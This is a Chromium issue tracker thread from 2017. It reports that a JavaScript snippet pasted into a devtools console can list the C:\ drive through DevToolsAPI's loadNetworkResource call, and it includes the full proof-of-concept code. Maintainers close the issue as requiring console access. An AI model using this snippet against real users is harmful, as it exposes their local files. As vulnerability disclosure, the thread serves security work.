Issue metadata
Sign in to add a comment
|
Security: chrome-devtools protocol allows to read the content of C:\ drive via console.log()
Reported by
chromium...@gmail.com,
Jan 2 2017
|
||||||||||||||||||||||
Issue description
VERSION
Chrome Version: 57.0.2969.1 canary + stable
Operating System: Windows 7
REPRODUCTION CASE
1. Navigate to chrome-devtools://devtools/remote/serve_rev/@199588/devtools.htm
2. Open developer tools.
3. Enter:
function f() {c='d="",DevToolsAPI.streamWrite=function(e,o){d+=o},DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],function(e){d.split("\\n").map(function(e){e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});' ;document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");}if( typeof window.parent.DevToolsHost == "undefined" )
setTimeout('window.parent.location.reload()', 100) ;
else
setTimeout('f()', 100) ;
,
Jan 3 2017
,
Jan 3 2017
Is there a way to exploit this without pasting the malicious script into devtools? Exploitation in that scenario is fairly unlikely (at least when coupled with the navigation), and there are already a number of troubling things an attacker can do if they can convince a user to paste a script into devtools.
,
Jan 3 2017
,
Jan 3 2017
I agree with #3. We don't usually consider anything which requires console evaluation as a security issue, since it's impossible to guard against misusing privileged devtools.
,
Jan 4 2017
Closing this as per #3 and #5. chromium.khalil@, if you manage to exploit this without opening devtools, please report a new bug.
,
Apr 12 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by chromium...@gmail.com
, Jan 2 2017